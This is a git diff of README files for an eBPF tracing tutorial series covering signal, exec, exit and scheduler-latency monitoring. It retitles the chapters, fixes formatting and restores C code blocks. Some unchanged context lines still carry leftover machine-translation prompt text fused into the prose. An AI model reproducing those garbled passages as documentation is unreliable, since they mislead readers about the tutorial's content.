b/src/6-sigsnoop/README.md index b48b434..2a8715b 100755 --- a/src/6-sigsnoop/README.md +++ b/src/6-sigsnoop/README.md @@ -60,9 +60,9 @@ static int probe_exit(void *ctx, int ret) eventp->ret = ret; bpf_printk("PID %d (%s) sent signal %d ", - eventp->pid, eventp->comm, eventp->sig); + eventp->pid, eventp->comm, eventp->sig); bpf_printk("to PID %d, ret = %d", - eventp->tpid, ret); + eventp->tpid, ret); cleanup: bpf_map_delete_elem(&values, &tid); @@ -116,10 +116,10 @@ Runing eBPF program... ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe - systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 + systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 ``` ## 总结 diff --git a/src/6-sigsnoop/README_en.md b/src/6-sigsnoop/README_en.md index 139d382..a319068 100755 --- a/src/6-sigsnoop/README_en.md +++ b/src/6-sigsnoop/README_en.md @@ -1,8 +1,8 @@ -# eBPF Beginner's Development Practice Tutorial 6: Capturing a Collection of System Calls that Send Signals to Processes, Using a Hash Map to Store State +# eBPF Tutorial by Example 6: Capturing Process Signal Sending and Using a Hash Map to Store State eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. -This article is the sixth part of the eBPF beginner's development practice tutorial, which mainly introduces how to implement an eBPF tool that captures a collection of system calls that send signals to processes and uses a hash map to store state. +This article is the sixth part of the eBPF Tutorial by Example. It mainly introduces how to implement an eBPF tool that captures a collection of system calls that send signals to processes and uses a hash map to store state. ## sigsnoop @@ -60,9 +60,9 @@ static int probe_exit(void *ctx, int ret) eventp->ret = ret; bpf_printk("PID %d (%s) sent signal %d ", - eventp->pid, eventp->comm, eventp->sig); + eventp->pid, eventp->comm, eventp->sig); bpf_printk("to PID %d, ret = %d", - eventp->tpid, ret); + eventp->tpid, ret); cleanup: bpf_map_delete_elem(&values, &tid); @@ -115,10 +115,10 @@ After running this program, you can view the output of the eBPF program by check ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe - systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 - systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 + systemd-journal-363 [000] d...1 672.563868: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563869: bpf_trace_printk: to PID 1400, ret = 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: PID 363 (systemd-journal) sent signal 0 + systemd-journal-363 [000] d...1 672.563870: bpf_trace_printk: to PID 1527, ret = -3 ``` ## Summary @@ -136,6 +136,4 @@ struct { And using corresponding APIs for access, such as bpf_map_lookup_elem, bpf_map_update_elem, bpf_map_delete_elem, etc. -For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf: - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials." \ No newline at end of file +If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/7-execsnoop/README_en.md b/src/7-execsnoop/README_en.md index 55c727e..3cf53d5 100644 --- a/src/7-execsnoop/README_en.md +++ b/src/7-execsnoop/README_en.md @@ -1,8 +1,8 @@ -# eBPF Beginner's Practical Tutorial Seven: Capturing Process Execution Event, Printing Output to User Space via perf event array +# eBPF Tutorial by Example 7: Capturing Process Execution Event, Printing Output with perf event array eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. -This article is the seventh part of the eBPF beginner's development tutorial and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed. +This article is the seventh part of the eBPF Tutorial by Example and mainly introduces how to capture process execution events in the Linux kernel and print output to the user command line via a perf event array. This eliminates the need to view the output of eBPF programs by checking the `/sys/kernel/debug/tracing/trace_pipe` file. After sending information to user space via the perf event array, complex data processing and analysis can be performed. ## perf buffer @@ -78,7 +78,7 @@ In the entry program, we first obtain the process ID and user ID of the current With this code, we can capture process execution events in the Linux kernel and analyze the process execution conditions.Instructions: Translate the following Chinese text to English while maintaining the original formatting: -"eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its goal is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). We use eunomia-bpf to compile and execute this example. +We use eunomia-bpf to compile and execute this example. You can refer to the following link to download and install the ecc compilation toolchain and ecli runtime: [https://github.com/eunomia-bpf/eunomia-bpf](https://github.com/eunomia-bpf/eunomia-bpf). Compile using a container: diff --git a/src/8-exitsnoop/README_en.md b/src/8-exitsnoop/README_en.md index 9448fd3..a6567f4 100644 --- a/src/8-exitsnoop/README_en.md +++ b/src/8-exitsnoop/README_en.md @@ -1,8 +1,8 @@ -# eBPF Introductory Development Tutorial 8: Monitoring Process Exit Events with eBPF, Using Ring Buffer to Print Output to User Space +# eBPF Tutorial by Example 8: Monitoring Process Exit Events, Print Output with Ring Buffer eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. -This article is the eighth part of the eBPF Introductory Development Tutorial, focusing on monitoring process exit events with eBPF. +This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF. ## Ring Buffer @@ -28,7 +28,7 @@ At the same time, the BPF ring buffer solves the following problems of the BPF p ## exitsnoop -This article is the eighth part of the eBPF Introductory Development Tutorial, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space. +This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space. The steps for printing output to user space using the ring buffer are similar to perf buffer. First, a header file needs to be defined: @@ -153,6 +153,7 @@ format: Return only the translated content, not including the original text.21:4 21:40:09 42057 42054 0 0 cat 21:40:09 42058 42054 0 0 cat 21:40:09 42059 42054 0 0 cat +``` ## Summary diff --git a/src/9-runqlat/README.md b/src/9-runqlat/README.md index 051c080..812b1f7 100755 --- a/src/9-runqlat/README.md +++ b/src/9-runqlat/README.md @@ -446,6 +446,4 @@ runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序 runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码: -更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: - 如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/9-runqlat/README_en.md b/src/9-runqlat/README_en.md index 2b4586f..efe779e 100755 --- a/src/9-runqlat/README_en.md +++ b/src/9-runqlat/README_en.md @@ -1,4 +1,4 @@ -# eBPF Beginner's Development Tutorial 9: Capturing Process Scheduling Latency and Recording as Histogram +# eBPF Tutorial by Example 9: Capturing Process Scheduling Latency and Recording as Histogram eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. @@ -43,8 +43,10 @@ Tracing run queue latency... Hit Ctrl-C to end. 128 -> 255 : 6 | | 256 -> 511 : 3 | | 512 -> 1023 : 5 | | - 1024 -> 2047 : 27 |* |". -format: Return only the translated content, not including the original text.## runqlat Code Implementation + 1024 -> 2047 : 27 |* | +``` + +## runqlat Code Implementation ### runqlat.bpf.c @@ -98,7 +100,6 @@ struct { static int trace_enqueue(u32 tgid, u32 pid) { -``````cpp u64 ts; if (!pid) @@ -182,52 +183,124 @@ return 0; SEC("raw_tp/sched_wakeup") int BPF_PROG(handle_sched_wakeup, struct task_struct *p) { -if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) return 0; -return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); + return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); } SEC("raw_tp/sched_wakeup_new") -```# BPF_PROG(handle_sched_wakeup_new, struct task_struct *p) Definition +int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p) +{ + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; -The code defines a function named `BPF_PROG(handle_sched_wakeup_new, struct task_struct *p)`. It takes a handle and a `task_struct` pointer as parameters. The function checks if a filter condition `filter_cg` is true and whether the current task is under the cgroup using the `bpf_current_task_under_cgroup` function with the `cgroup_map` parameter. If the filter condition is true and the task is not under the cgroup, the function returns 0. Otherwise, it calls the `trace_enqueue` function with the `BPF_CORE_READ(p, tgid)` and `BPF_CORE_READ(p, pid)` values and returns the result. + return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); +} -## SEC("raw_tp/sched_switch") Definition +SEC("raw_tp/sched_switch") +int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next) +{ + return handle_switch(preempt, prev, next); +} -The code defines another function named `BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)`. It is associated with the `raw_tp/sched_switch` security section. It takes a boolean parameter `preempt` and two `task_struct` pointers named `prev` and `next`. The function calls the `handle_switch` function with the `preempt`, `prev`, and `next` parameters and returns the result. +char LICENSE[] SEC("license") = "GPL"; +``` -## LICENSE Declaration - -The code declares a character array named `LICENSE` and assigns it the value "GPL". It is associated with the `license` security section. - -## Constants and Global Variables +#### Constants and Global Variables The code defines several constants and volatile global variables used for filtering corresponding tracing targets. These variables include: +```c +#define MAX_ENTRIES 10240 +#define TASK_RUNNING 0 + +const volatile bool filter_cg = false; +const volatile bool targ_per_process = false; +const volatile bool targ_per_thread = false; +const volatile bool targ_per_pidns = false; +const volatile bool targ_ms = false; +const volatile pid_t targ_tgid = 0; +``` + - `MAX_ENTRIES`: The maximum number of map entries. - `TASK_RUNNING`: The task status value. - `filter_cg`, `targ_per_process`, `targ_per_thread`, `targ_per_pidns`, `targ_ms`, `targ_tgid`: Boolean variables for filtering and target options. These options can be set by user-space programs to customize the behavior of the eBPF program. -## eBPF Maps +#### eBPF Maps The code defines several eBPF maps including: + +```c +struct { + __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); + __type(key, u32); + __type(value, u32); + __uint(max_entries, 1); +} cgroup_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, u64); +} start SEC(".maps"); + +static struct hist zero; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, struct hist); +} hists SEC(".maps"); +``` + - `cgroup_map`: A cgroup array map used for filtering cgroups. - `start`: A hash map used to store timestamps when processes are enqueued. - `hists`: A hash map used to store histogram data for recording process scheduling delays. -## Helper Functions +#### Helper Functions The code includes two helper functions: + - `trace_enqueue`: This function is used to record the timestamp when a process is enqueued. It takes the `tgid` and `pid` values as parameters. If the `pid` value is 0 or the `targ_tgid` value is not 0 and not equal to `tgid`, the function returns 0. Otherwise, it retrieves the current timestamp using `bpf_ktime_get_ns` and updates the `start` map with the `pid` key and the timestamp value. + +```c +static int trace_enqueue(u32 tgid, u32 pid) +{ + u64 ts; + + if (!pid) + return 0; + if (targ_tgid && targ_tgid != tgid) + return 0; + + ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); + return 0; +} +``` + - `pid_namespace`: This function is used to get the PID namespace of a process. It takes a `task_struct` pointer as a parameter and returns the PID namespace of the process. The function retrieves the PID namespace by following `task_active_pid_ns()` and `pid->numbers[pid->level].ns`. -Please note that the translation of function names and variable names may require further context.``` -level = BPF_CORE_READ(pid, level); -bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); -inum = BPF_CORE_READ(upid.ns, ns.inum); +```c +static unsigned int pid_namespace(struct task_struct *task) +{ + struct pid *pid; + unsigned int level; + struct upid upid; + unsigned int inum; -return inum; + /* get the pid namespace by following task_active_pid_ns(), + * pid->numbers[pid->level].ns + */ + pid = BPF_CORE_READ(task, thread_pid); + level = BPF_CORE_READ(pid, level); + bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); + inum = BPF_CORE_READ(upid.ns, ns.inum); + + return inum; } ``` @@ -280,10 +353,7 @@ struct hist { ## Compilation and Execution -`eunomia-bpf` is an open-source eBPF dynamic loading runtime and development toolkit combined with Wasm. -Its purpose is to simplify the development, build, distribution, and execution of eBPF programs. -You can refer to to download and install the `ecc` compilation toolkit and `ecli` runtime. -We will use `eunomia-bpf` to compile and run this example. +We will use `eunomia-bpf` to compile and run this example. You can refer to to download and install the `ecc` compilation toolkit and `ecli` runtime. Compile: @@ -354,11 +424,11 @@ comm = cpptools 64 -> 127 : 8 |***************************** | 128 -> 255 : 3 |********** | -``` +``` Complete source code can be found at: -References: +References: - - @@ -369,6 +439,4 @@ runqlat is a Linux kernel BPF program that summarizes scheduler run queue latenc runqlat is a tool for monitoring process scheduling latency in the Linux kernel. It can help you understand the time processes spend waiting to run in the kernel and optimize process scheduling based on this information to improve system performance. The original source code can be found in libbpf-tools: -For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf: - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. \ No newline at end of file +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials.